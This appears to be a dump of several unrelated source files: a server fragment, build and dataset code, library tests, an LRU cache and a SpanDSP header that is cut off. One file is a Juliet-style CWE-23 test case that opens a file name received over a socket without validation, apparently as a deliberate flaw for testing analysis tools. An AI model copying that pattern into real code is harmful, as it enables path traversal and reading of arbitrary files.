server.use(bodyParser.urlencoded({ extended: true, parameterLimit: 100000, limit: '50mb' }));
server.use(bodyParser.json({ limit: '50mb' }));
// server.get('/', async (req, res) => {
// // await User.create({
// // department: 'AI Research',
// // displayName: 'Jia Wang',
// // email: '[email protected]',
// // googleId: process.env.GOOGLE_CLIENTID,
// // avatarUrl:
// // 'https://lh3.googleusercontent.com/-XdUIqdMkCWA/AAAAAAAAAAI/AAAAAAAAAAA/4252rscbv5M/photo.jpg?sz=128',
// // });
// const user = await User.findOne({ department: 'AI Research' });
// req.user = user;
// app.render(req, res, '/');
// });
setupGoogle({ server, ROOT_URL });
fileSystem({ server });
api(server);
// server.get('*', (req, res) => handle(req, res));
server.get('*', (req, res) => {
const url = URL_MAP[req.path];
if (url) {
app.render(req, res, url);
} else {
handle(req, res);
}
});
// starting express server
server.listen(port, (err) => {
if (err) throw err;
logger.info(`> Ready on ${ROOT_URL}`); // eslint-disable-line no-console
});
});
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import sys
from spack import *
class ScalapackBase(CMakePackage):
"""Base class for building ScaLAPACK, shared with the AMD optimized version
of the library in the 'amdscalapack' package.
"""
variant(
'build_type',
default='Release',
description='CMake build type',
values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
variant(
'shared',
default=True,
description='Build the shared library version'
)
variant(
'pic',
default=False,
description='Build position independent code'
)
provides('scalapack')
depends_on('mpi')
depends_on('lapack')
depends_on('blas')
depends_on('cmake', when='@2.0.0:', type='build')
# See: https://github.com/Reference-ScaLAPACK/scalapack/issues/9
patch("cmake_fortran_mangle.patch", when='@2.0.2:2.0')
# See: https://github.com/Reference-ScaLAPACK/scalapack/pull/10
patch("mpi2-compatibility.patch", when='@2.0.2:2.0')
# See: https://github.com/Reference-ScaLAPACK/scalapack/pull/16
patch("int_overflow.patch", when='@2.0.0:2.1.0')
# See: https://github.com/Reference-ScaLAPACK/scalapack/pull/23
patch("gcc10-compatibility.patch", when='@2.0.0:2.1.0')
@property
def libs(self):
# Note that the default will be to search
# for 'libnetlib-scalapack.<suffix>'
shared = True if '+shared' in self.spec else False
return find_libraries(
'libscalapack', root=self.prefix, shared=shared, recursive=True
)
def cmake_args(self):
spec = self.spec
options = [
"-DBUILD_SHARED_LIBS:BOOL=%s" % ('ON' if '+shared' in spec else
'OFF'),
"-DBUILD_STATIC_LIBS:BOOL=%s" % ('OFF' if '+shared' in spec else
'ON')
]
# Make sure we use Spack's Lapack:
blas = spec['blas'].libs
lapack = spec['lapack'].libs
options.extend([
'-DLAPACK_FOUND=true',
'-DLAPACK_INCLUDE_DIRS=%s' % spec['lapack'].prefix.include,
'-DLAPACK_LIBRARIES=%s' % (lapack.joined(';')),
'-DBLAS_LIBRARIES=%s' % (blas.joined(';'))
])
c_flags = []
if '+pic' in spec:
c_flags.append(self.compiler.cc_pic_flag)
options.append(
"-DCMAKE_Fortran_FLAGS=%s" % self.compiler.fc_pic_flag
)
# Work around errors of the form:
# error: implicit declaration of function 'BI_smvcopy' is
# invalid in C99 [-Werror,-Wimplicit-function-declaration]
if spec.satisfies('%clang') or spec.satisfies('%apple-clang'):
c_flags.append('-Wno-error=implicit-function-declaration')
options.append(
self.define('CMAKE_C_FLAGS', ' '.join(c_flags))
)
return options
@run_after('install')
def fix_darwin_install(self):
# The shared libraries are not installed correctly on Darwin:
if (sys.platform == 'darwin') and ('+shared' in self.spec):
fix_darwin_install_name(self.spec.prefix.lib)
class NetlibScalapack(ScalapackBase):
"""ScaLAPACK is a library of high-performance linear algebra routines for
parallel distributed memory machines
"""
homepage = "https://www.netlib.org/scalapack/"
url = "https://www.netlib.org/scalapack/scalapack-2.0.2.tgz"
tags = ['e4s']
version('2.1.0', sha256='61d9216cf81d246944720cfce96255878a3f85dec13b9351f1fa0fd6768220a6')
version('2.0.2', sha256='0c74aeae690fe5ee4db7926f49c5d0bb69ce09eea75beb915e00bba07530395c')
version('2.0.1', sha256='a9b34278d4e10b40cbe084c6d87d09af8845e874250719bfbbc497b2a88bfde1')
version('2.0.0', sha256='e51fbd9c3ef3a0dbd81385b868e2355900148eea689bf915c5383d72daf73114')
# versions before 2.0.0 are not using cmake and requires blacs as
# a separated package
|
import os
from typing import Optional
from pytorchltr.utils.downloader import DefaultDownloadProgress
from pytorchltr.utils.downloader import Downloader
from pytorchltr.utils.file import validate_and_download
from pytorchltr.utils.file import extract_zip
from pytorchltr.utils.file import dataset_dir
from pytorchltr.datasets.svmrank.svmrank import SVMRankDataset
class MSLR10K(SVMRankDataset):
"""
Utility class for downloading and using the MSLR-WEB10K dataset:
https://www.microsoft.com/en-us/research/project/mslr/.
This dataset is a smaller sampled version of the MSLR-WEB30K dataset.
"""
downloader = Downloader(
url="https://api.onedrive.com/v1.0/shares/s!AtsMfWUz5l8nbOIoJ6Ks0bEMp78/root/content", # noqa: E501
target="MSLR-WEB10K.zip",
sha256_checksum="2902142ea33f18c59414f654212de5063033b707d5c3939556124b1120d3a0ba", # noqa: E501
progress_fn=DefaultDownloadProgress(),
postprocess_fn=extract_zip)
per_fold_expected_files = {
1: [
{"path": "Fold1/train.txt", "sha256": "6eb3fae4e1186e1242a6520f53a98abdbcde5b926dd19a28e51239284b1d55dc"}, # noqa: E501
{"path": "Fold1/test.txt", "sha256": "33fe002374a4fce58c4e12863e4eee74745d5672a26f3e4ddacc20ccfe7d6ba0"}, # noqa: E501
{"path": "Fold1/vali.txt", "sha256": "e86fb3fe7e8a5f16479da7ce04f783ae85735f17f66016786c3ffc797dd9d4db"} # noqa: E501
],
2: [
{"path": "Fold2/train.txt", "sha256": "40e4a2fcc237d9c164cbb6a3f2fa91fe6cf7d46a419d2f73e21cf090285659eb"}, # noqa: E501
{"path": "Fold2/test.txt", "sha256": "44add582ccd674cf63af24d3bf6e1074e87a678db77f00b44c37980a3010917a"}, # noqa: E501
{"path": "Fold2/vali.txt", "sha256": "33fe002374a4fce58c4e12863e4eee74745d5672a26f3e4ddacc20ccfe7d6ba0"} # noqa: E501
],
3: [
{"path": "Fold3/train.txt", "sha256": "f13005ceb8de0db76c93b02ee4b2bded6f925097d3ab7938931e8d07aa72acd7"}, # noqa: E501
{"path": "Fold3/test.txt", "sha256": "c0a5a3c6bd7790d0b4ff3d5e961d0c8c5f8ff149089ce492540fa63035801b7a"}, # noqa: E501
{"path": "Fold3/vali.txt", "sha256": "44add582ccd674cf63af24d3bf6e1074e87a678db77f00b44c37980a3010917a"} # noqa: E501
],
4: [
{"path": "Fold4/train.txt", "sha256": "6c1677cf9b2ed491e26ac6b8c8ca7dfae9c1a375e2bce8cba6df36ab67ce5836"}, # noqa: E501
{"path": "Fold4/test.txt", "sha256": "dc6083c24a5f0c03df3c91ad3eed7542694115b998acf046e51432cb7a22b848"}, # noqa: E501
{"path": "Fold4/vali.txt", "sha256": "c0a5a3c6bd7790d0b4ff3d5e961d0c8c5f8ff149089ce492540fa63035801b7a"} # noqa: E501
],
5: [
{"path": "Fold5/train.txt", "sha256": "4249797a2f0f46bff279973f0fb055d4a78f67f337769eabd56e82332c044794"}, # noqa: E501
{"path": "Fold5/test.txt", "sha256": "e86fb3fe7e8a5f16479da7ce04f783ae85735f17f66016786c3ffc797dd9d4db"}, # noqa: E501
{"path": "Fold5/vali.txt", "sha256": "dc6083c24a5f0c03df3c91ad3eed7542694115b998acf046e51432cb7a22b848"} # noqa: E501
]
}
splits = {
"train": "train.txt",
"test": "test.txt",
"vali": "vali.txt"
}
def __init__(self, location: str = dataset_dir("MSLR10K"),
split: str = "train", fold: int = 1, normalize: bool = True,
filter_queries: Optional[bool] = None, download: bool = True,
validate_checksums: bool = True):
"""
Args:
location: Directory where the dataset is located.
split: The data split to load ("train", "test" or "vali")
fold: Which data fold to load (1...5)
normalize: Whether to perform query-level feature
normalization.
filter_queries: Whether to filter out queries that
have no relevant items. If not given this will filter queries
for the test set but not the train set.
download: Whether to download the dataset if it does not
exist.
validate_checksums: Whether to validate the dataset files
via sha256.
"""
# Check if specified split and fold exists.
if split not in MSLR10K.splits.keys():
raise ValueError("unrecognized data split '%s'" % str(split))
if fold not in MSLR10K.per_fold_expected_files.keys():
raise ValueError("unrecognized data fold '%s'" % str(fold))
# Validate dataset exists and is correct, or download it.
validate_and_download(
location=location,
expected_files=MSLR10K.per_fold_expected_files[fold],
downloader=MSLR10K.downloader if download else None,
validate_checksums=validate_checksums)
# Only filter queries on non-train splits.
if filter_queries is None:
filter_queries = False if split == "train" else True
# Initialize the dataset.
datafile = os.path.join(location, "Fold%d" % fold,
MSLR10K.splits[split])
super().__init__(file=datafile, sparse=False, normalize=normalize,
filter_queries=filter_queries, zero_based="auto")
|
/*
Package: dyncall
Library: test
File: test/callf/main.c
Description:
License:
Copyright (c) 2007-2021 Daniel Adler <[email protected]>,
Tassilo Philipp <[email protected]>
Permission to use, copy, modify, and distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/
/* test dcCallF API */
#include "../../dyncall/dyncall_callf.h"
#include "../common/platformInit.h"
#include "../common/platformInit.c" /* Impl. for functions only used in this translation unit */
#include <stdarg.h>
#if defined(DC_UNIX) && !defined(DC__OS_BeOS)
#include <sys/syscall.h>
#endif
/* sample void function */
int vf_iii(int x,int y,int z)
{
int r = (x == 1 && y == 2 && z == 3);
printf("%d %d %d: %d", x, y, z, r);
return r;
}
int vf_ffiffiffi(float a, float b, int c, float d, float e, int f, float g, float h, int i)
{
int r = (a == 1.f && b == 2.f && c == 3 && d == 4.f && e == 5.f && f == 6 && g == 7.f && h == 8.f && i == 9);
printf("%f %f %d %f %f %d %f %f %d: %d", a, b, c, d, e, f, g, h, i, r);
return r;
}
int vf_ffiV(float a, float b, int c, ...)
{
va_list ap;
double d, e, g, h;
int f, i;
int r;
va_start(ap, c);
d = va_arg(ap, double);
e = va_arg(ap, double);
f = va_arg(ap, int);
g = va_arg(ap, double);
h = va_arg(ap, double);
i = va_arg(ap, int);
va_end(ap);
r = (a == 1.f && b == 2.f && c == 3 && d == 4. && e == 5. && f == 6 && g == 7. && h == 8. && i == 9);
printf("%f %f %d %f %f %d %f %f %d: %d", a, b, c, d, e, f, g, h, i, r);
return r;
}
/* main */
int main(int argc, char* argv[])
{
DCCallVM* vm;
DCValue ret;
int r = 1;
dcTest_initPlatform();
/* allocate call vm */
vm = dcNewCallVM(4096);
/* calls using 'formatted' API */
dcReset(vm);
printf("callf iii)i: ");
dcCallF(vm, &ret, (void*)&vf_iii, "iii)i", 1, 2, 3);
r = ret.i && r;
dcReset(vm);
printf("\ncallf ffiffiffi)i: ");
dcCallF(vm, &ret, (void*)&vf_ffiffiffi, "ffiffiffi)i", 1.f, 2.f, 3, 4.f, 5.f, 6, 7.f, 8.f, 9);
r = ret.i && r;
/* same but with calling convention prefix */
dcReset(vm);
printf("\ncallf _:ffiffiffi)i: ");
dcCallF(vm, &ret, (void*)&vf_ffiffiffi, "_:ffiffiffi)i", 1.f, 2.f, 3, 4.f, 5.f, 6, 7.f, 8.f, 9);
r = ret.i && r;
/* vararg call */
dcReset(vm);
printf("\ncallf _effi_.ddiddi)i: ");
dcCallF(vm, &ret, (void*)&vf_ffiV, "_effi_.ddiddi)i", 1.f, 2.f, 3, 4., 5., 6, 7., 8., 9);
r = ret.i && r;
/* arg binding then call using 'formatted' API */
dcReset(vm);
/* reset calling convention too */
dcMode(vm, DC_CALL_C_DEFAULT);
printf("\nargf iii)i then call: ");
dcArgF(vm, "iii)i", 1, 2, 3);
r = r && dcCallInt(vm, (void*)&vf_iii);
dcReset(vm);
printf("\nargf iii then call: ");
dcArgF(vm, "iii", 1, 2, 3);
r = r && dcCallInt(vm, (void*)&vf_iii);
dcReset(vm);
printf("\nargf ffiffiffi)i then call: ");
dcArgF(vm, "ffiffiffi)i", 1.f, 2.f, 3, 4.f, 5.f, 6, 7.f, 8.f, 9);
r = r && dcCallInt(vm, (void*)&vf_ffiffiffi);
dcReset(vm);
printf("\nargf ffiffiffi then call: ");
dcArgF(vm, "ffiffiffi", 1.f, 2.f, 3, 4.f, 5.f, 6, 7.f, 8.f, 9);
r = r && dcCallInt(vm, (void*)&vf_ffiffiffi);
#if defined(DC_UNIX) && !defined(DC__OS_MacOSX) && !defined(DC__OS_SunOS) && !defined(DC__OS_BeOS)
/* testing syscall using calling convention prefix - not available on all platforms */
dcReset(vm);
printf("\ncallf _$iZi)i");
fflush(NULL); /* needed before syscall write as it's immediate, or order might be incorrect */
dcCallF(vm, &ret, (DCpointer)(ptrdiff_t)SYS_write, "_$iZi)i", 1/*stdout*/, " = syscall: 1", 13);
r = ret.i == 13 && r;
#endif
/* free vm */
dcFree(vm);
printf("\nresult: callf: %d\n", r);
dcTest_deInitPlatform();
return 0;
}
|
// This is a library to be used to represent a Graph and various measurments for a Graph
// and to perform optimization using Particle Swarm Optimization (PSO)
// Copyright (C) 2008, 2015
// Patrick Olekas - [email protected]
// Ali Minai - [email protected]
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program. If not, see <http://www.gnu.org/licenses/>.
package psograph.graph;
import java.io.Serializable;
/**
* This represents a Edge.
*
* There is some commented out code I believe in this file to support DAG and the concept
* of multiple edges between two nodes.
* @author Patrick
*
*/
public class Edge implements Serializable
{
static final long serialVersionUID = 45L;
/**
* Copy Constructor
* @param ci
*/
public Edge(Edge ci)
{
m_weight = ci.m_weight;
}
/**
* Constructor
* @param weight
*/
public Edge(double weight)
{
m_weight = weight;
}
/**
* Comparison of two objects
*/
public boolean equals (Object obj)
{
boolean ret = true;
Edge e = (Edge)obj;
if(Double.compare(m_weight, e.getWeight()) != 0)
{
ret = false;
}
return ret;
}
/**
* Mutator for weight value.
* @param weight
*/
public void modifyWeight(double weight)
{
m_weight = weight;
}
/**
* Accessor for weight.
* @return
*/
public double getWeight()
{
return m_weight;
}
private double m_weight;
/* Only allow on weight per node to node connection
ConnectionInfo(ConnectionInfo ci)
{
m_weight = new Vector<Integer>(ci.m_weight);
}
ConnectionInfo(int weight)
{
m_weight = new Vector<Integer>();
m_weight.add(weight);
}
ConnectionInfo(int weight[])
{
m_weight = new Vector<Integer>();
for(int i=0; i < weight.length; i++)
m_weight.add(weight[i]);
}
void addWeight(int weight)
{
m_weight.add(weight);
}
void addWeights(int weight[])
{
m_weight = new Vector<Integer>();
for(int i=0; i < weight.length; i++)
m_weight.add(weight[i]);
}
void removeWeight(int weight)
{
m_weight.remove(new Integer(weight));
}
void removeWeights(int weight[])
{
for(int i=0; i < weight.length; i++)
m_weight.remove(new Integer(weight[i]));
}
Vector<Integer> m_weight;
*/
}
|
// Protocol Buffers - Google's data interchange format
// Copyright 2008 Google Inc.
// http://code.google.com/p/protobuf/
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Author: [email protected] (Kenton Varda)
// Based on original Protocol Buffers design by
// Sanjay Ghemawat, Jeff Dean, and others.
// Modified to implement C code by Dave Benson.
#include <google/protobuf/compiler/c/c_enum_field.h>
#include <google/protobuf/compiler/c/c_helpers.h>
#include <google/protobuf/io/printer.h>
#include <google/protobuf/wire_format.h>
namespace google {
namespace protobuf {
namespace compiler {
namespace c {
using internal::WireFormat;
// TODO(kenton): Factor out a "SetCommonFieldVariables()" to get rid of
// repeat code between this and the other field types.
void SetEnumVariables(const FieldDescriptor* descriptor,
map<string, string>* variables) {
(*variables)["name"] = FieldName(descriptor);
(*variables)["type"] = FullNameToC(descriptor->enum_type()->full_name());
if (descriptor->has_default_value()) {
const EnumValueDescriptor* default_value = descriptor->default_value_enum();
(*variables)["default"] = FullNameToUpper(default_value->type()->full_name())
+ "__" + ToUpper(default_value->name());
} else
(*variables)["default"] = "0";
(*variables)["deprecated"] = FieldDeprecated(descriptor);
}
// ===================================================================
EnumFieldGenerator::
EnumFieldGenerator(const FieldDescriptor* descriptor)
: FieldGenerator(descriptor)
{
SetEnumVariables(descriptor, &variables_);
}
EnumFieldGenerator::~EnumFieldGenerator() {}
void EnumFieldGenerator::GenerateStructMembers(io::Printer* printer) const
{
switch (descriptor_->label()) {
case FieldDescriptor::LABEL_REQUIRED:
printer->Print(variables_, "$type$ $name$$deprecated$;\n");
break;
case FieldDescriptor::LABEL_OPTIONAL:
printer->Print(variables_, "protobuf_c_boolean has_$name$$deprecated$;\n");
printer->Print(variables_, "$type$ $name$$deprecated$;\n");
break;
case FieldDescriptor::LABEL_REPEATED:
printer->Print(variables_, "size_t n_$name$$deprecated$;\n");
printer->Print(variables_, "$type$ *$name$$deprecated$;\n");
break;
}
}
string EnumFieldGenerator::GetDefaultValue(void) const
{
return variables_.find("default")->second;
}
void EnumFieldGenerator::GenerateStaticInit(io::Printer* printer) const
{
switch (descriptor_->label()) {
case FieldDescriptor::LABEL_REQUIRED:
printer->Print(variables_, "$default$");
break;
case FieldDescriptor::LABEL_OPTIONAL:
printer->Print(variables_, "0,$default$");
break;
case FieldDescriptor::LABEL_REPEATED:
// no support for default?
printer->Print("0,NULL");
break;
}
}
void EnumFieldGenerator::GenerateDescriptorInitializer(io::Printer* printer) const
{
string addr = "&" + FullNameToLower(descriptor_->enum_type()->full_name()) + "__descriptor";
GenerateDescriptorInitializerGeneric(printer, true, "ENUM", addr);
}
} // namespace c
} // namespace compiler
} // namespace protobuf
} // namespace google
|
/*
* Copyright (C) 2015 - 2016 VREM Software Development <[email protected]>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.vrem.wifianalyzer.wifi.graph.channel;
import android.content.Context;
import android.content.res.Resources;
import android.support.v4.util.Pair;
import android.view.View;
import com.jjoe64.graphview.GraphView;
import com.vrem.wifianalyzer.BuildConfig;
import com.vrem.wifianalyzer.Configuration;
import com.vrem.wifianalyzer.RobolectricUtil;
import com.vrem.wifianalyzer.settings.Settings;
import com.vrem.wifianalyzer.wifi.band.WiFiBand;
import com.vrem.wifianalyzer.wifi.band.WiFiChannel;
import com.vrem.wifianalyzer.wifi.graph.tools.GraphLegend;
import com.vrem.wifianalyzer.wifi.graph.tools.GraphViewWrapper;
import com.vrem.wifianalyzer.wifi.model.SortBy;
import com.vrem.wifianalyzer.wifi.model.WiFiConnection;
import com.vrem.wifianalyzer.wifi.model.WiFiData;
import com.vrem.wifianalyzer.wifi.model.WiFiDetail;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.robolectric.RobolectricGradleTestRunner;
import org.robolectric.annotation.Config;
import java.util.ArrayList;
import java.util.Set;
import static org.junit.Assert.assertEquals;
import static org.mockito.Matchers.any;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
@RunWith(RobolectricGradleTestRunner.class)
@Config(constants = BuildConfig.class)
public class ChannelGraphViewTest {
private Context context;
private Resources resources;
private Settings settings;
private Configuration configuration;
private GraphViewWrapper graphViewWrapper;
private ChannelGraphView fixture;
@Before
public void setUp() throws Exception {
RobolectricUtil.INSTANCE.getMainActivity();
graphViewWrapper = mock(GraphViewWrapper.class);
context = mock(Context.class);
resources = mock(Resources.class);
settings = mock(Settings.class);
configuration = mock(Configuration.class);
fixture = new ChannelGraphView(WiFiBand.GHZ2, new Pair<>(WiFiChannel.UNKNOWN, WiFiChannel.UNKNOWN));
fixture.setGraphViewWrapper(graphViewWrapper);
fixture.setContext(context);
fixture.setResources(resources);
fixture.setSettings(settings);
fixture.setConfiguration(configuration);
}
@Test
public void testUpdate() throws Exception {
// setup
WiFiData wiFiData = new WiFiData(new ArrayList<WiFiDetail>(), WiFiConnection.EMPTY, new ArrayList<String>());
withSettings();
// execute
fixture.update(wiFiData);
// validate
verify(graphViewWrapper).removeSeries(any(Set.class));
verify(graphViewWrapper).updateLegend(GraphLegend.RIGHT);
verify(graphViewWrapper).setVisibility(View.VISIBLE);
verifySettings();
}
private void verifySettings() {
verify(settings).getChannelGraphLegend();
verify(settings).getSortBy();
verify(settings).getWiFiBand();
}
private void withSettings() {
when(settings.getChannelGraphLegend()).thenReturn(GraphLegend.RIGHT);
when(settings.getSortBy()).thenReturn(SortBy.CHANNEL);
when(settings.getWiFiBand()).thenReturn(WiFiBand.GHZ2);
}
@Test
public void testGetGraphView() throws Exception {
// setup
GraphView expected = mock(GraphView.class);
when(graphViewWrapper.getGraphView()).thenReturn(expected);
// execute
GraphView actual = fixture.getGraphView();
// validate
assertEquals(expected, actual);
verify(graphViewWrapper).getGraphView();
}
} |
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83_bad.cpp
Label Definition File: CWE23_Relative_Path_Traversal.label.xml
Template File: sources-sink-83_bad.tmpl.cpp
*/
/*
* @description
* CWE: 23 Relative Path Traversal
* BadSource: connect_socket Read data using a connect socket (client side)
* GoodSource: Use a fixed file name
* Sinks: ifstream
* BadSink : Open the file named in data using ifstream::open()
* Flow Variant: 83 Data flow: data passed to class constructor and destructor by declaring the class object on the stack
*
* */
#ifndef OMITBAD
#include "std_testcase.h"
#include "CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83.h"
#ifdef _WIN32
#include <winsock2.h>
#include <windows.h>
#include <direct.h>
#pragma comment(lib, "ws2_32") /* include ws2_32.lib when linking */
#define CLOSE_SOCKET closesocket
#else /* NOT _WIN32 */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define CLOSE_SOCKET close
#define SOCKET int
#endif
#define TCP_PORT 27015
#define IP_ADDRESS "127.0.0.1"
#include <fstream>
using namespace std;
namespace CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83
{
CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83_bad::CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83_bad(char * dataCopy)
{
data = dataCopy;
{
#ifdef _WIN32
WSADATA wsaData;
int wsaDataInit = 0;
#endif
int recvResult;
struct sockaddr_in service;
char *replace;
SOCKET connectSocket = INVALID_SOCKET;
size_t dataLen = strlen(data);
do
{
#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
break;
}
wsaDataInit = 1;
#endif
/* POTENTIAL FLAW: Read data using a connect socket */
connectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (connectSocket == INVALID_SOCKET)
{
break;
}
memset(&service, 0, sizeof(service));
service.sin_family = AF_INET;
service.sin_addr.s_addr = inet_addr(IP_ADDRESS);
service.sin_port = htons(TCP_PORT);
if (connect(connectSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR)
{
break;
}
/* Abort on error or the connection was closed, make sure to recv one
* less char than is in the recv_buf in order to append a terminator */
/* Abort on error or the connection was closed */
recvResult = recv(connectSocket, (char *)(data + dataLen), sizeof(char) * (FILENAME_MAX - dataLen - 1), 0);
if (recvResult == SOCKET_ERROR || recvResult == 0)
{
break;
}
/* Append null terminator */
data[dataLen + recvResult / sizeof(char)] = '\0';
/* Eliminate CRLF */
replace = strchr(data, '\r');
if (replace)
{
*replace = '\0';
}
replace = strchr(data, '\n');
if (replace)
{
*replace = '\0';
}
}
while (0);
if (connectSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(connectSocket);
}
#ifdef _WIN32
if (wsaDataInit)
{
WSACleanup();
}
#endif
}
}
CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83_bad::~CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83_bad()
{
{
ifstream inputFile;
/* POTENTIAL FLAW: Possibly opening a file without validating the file name or path */
inputFile.open((char *)data);
inputFile.close();
}
}
}
#endif /* OMITBAD */
|
/**
* Tiny LRU cache for Client or Server
*
* @author Jason Mulligan <[email protected]>
* @copyright 2018
* @license BSD-3-Clause
* @link https://github.com/avoidwork/tiny-lru
* @version 5.0.5
*/
"use strict";
(function (global) {
const empty = null;
class LRU {
constructor (max, ttl) {
this.clear();
this.max = max;
this.ttl = ttl;
}
clear () {
this.cache = {};
this.first = empty;
this.last = empty;
this.length = 0;
return this;
}
delete (key, bypass = false) {
return this.remove(key, bypass);
}
evict () {
if (this.length > 0) {
this.remove(this.last, true);
}
return this;
}
get (key) {
let result;
if (this.has(key) === true) {
const item = this.cache[key];
if (item.expiry === -1 || item.expiry > Date.now()) {
result = item.value;
this.set(key, result, true);
} else {
this.remove(key, true);
}
}
return result;
}
has (key) {
return key in this.cache;
}
remove (key, bypass = false) {
if (bypass === true || this.has(key) === true) {
const item = this.cache[key];
delete this.cache[key];
this.length--;
if (item.next !== empty) {
this.cache[item.next].prev = item.prev;
}
if (item.prev !== empty) {
this.cache[item.prev].next = item.next;
}
if (this.first === key) {
this.first = item.next;
}
if (this.last === key) {
this.last = item.prev;
}
}
return this;
}
set (key, value, bypass = false) {
if (bypass === true || this.has(key) === true) {
const item = this.cache[key];
item.value = value;
if (this.first !== key) {
const p = item.prev,
n = item.next,
f = this.cache[this.first];
item.prev = empty;
item.next = this.first;
f.prev = key;
if (p !== empty) {
this.cache[p].next = n;
}
if (n !== empty) {
this.cache[n].prev = p;
}
if (this.last === key) {
this.last = p;
}
}
} else {
if (this.length === this.max) {
this.evict();
}
this.length++;
this.cache[key] = {
expiry: this.ttl > 0 ? new Date().getTime() + this.ttl : -1,
prev: empty,
next: this.first,
value: value
};
if (this.length === 1) {
this.last = key;
} else {
this.cache[this.first].prev = key;
}
}
this.first = key;
return this;
}
}
function factory (max = 1000, ttl = 0) {
return new LRU(max, ttl);
}
// Node, AMD & window supported
if (typeof exports !== "undefined") {
module.exports = factory;
} else if (typeof define === "function" && define.amd !== void 0) {
define(() => factory);
} else {
global.lru = factory;
}
}(typeof window !== "undefined" ? window : global));
|
/*
* SpanDSP - a series of DSP components for telephony
*
* super_tone_rx.h - Flexible telephony supervisory tone detection.
*
* Written by Steve Underwood <[email protected]>
*
* Copyright (C) 2003 Steve Underwood
*
* All rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License version 2.1,
* as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
* $Id: super_tone_rx.h,v 1.21 2009/02/10 13:06:47 steveu Exp $
*/
#if !defined(_SPANDSP_SUPER_TONE_RX_H_)
#define _SPANDSP_SUPER_TONE_RX_H_
/*! \page super_tone_rx_page Supervisory tone detection
\section super_tone_rx_page_sec_1 What does it do?
The supervisory tone detector may be configured to detect most of the world's
telephone supervisory tones - things like ringback, busy, number unobtainable,
and so on.
\section super_tone_rx_page_sec_2 How does it work?
The supervisory tone detector is passed a series of data structures describing
the tone patterns - the frequencies and cadencing - of the tones to be searched
for. It constructs one or more Goertzel filters to monitor the required tones.
If tones are close in frequency a single Goertzel set to the centre of the
frequency range will be used. This optimises the efficiency of the detector. The
Goertzel filters are applied without applying any special window functional
(i.e. they use a rectangular window), so they have a sinc like response.
However, for most tone patterns their rejection qualities are adequate.
The detector aims to meet the need of the standard call progress tones, to
ITU-T E.180/Q.35 (busy, dial, ringback, reorder). Also, the extended tones,
to ITU-T E.180, Supplement 2 and EIA/TIA-464-A (recall dial tone, special
ringback tone, intercept tone, call waiting tone, busy verification tone,
executive override tone, confirmation tone).
*/
/*! Tone detection indication callback routine */
typedef void (*tone_report_func_t)(void *user_data, int code, int level, int delay);
typedef struct super_tone_rx_segment_s super_tone_rx_segment_t;
typedef struct super_tone_rx_descriptor_s super_tone_rx_descriptor_t;
typedef struct super_tone_rx_state_s super_tone_rx_state_t;
#if defined(__cplusplus)
extern "C"
{
#endif
/*! Create a new supervisory tone detector descriptor.
\param desc The supervisory tone set desciptor. If NULL, the routine will allocate space for a
descriptor.
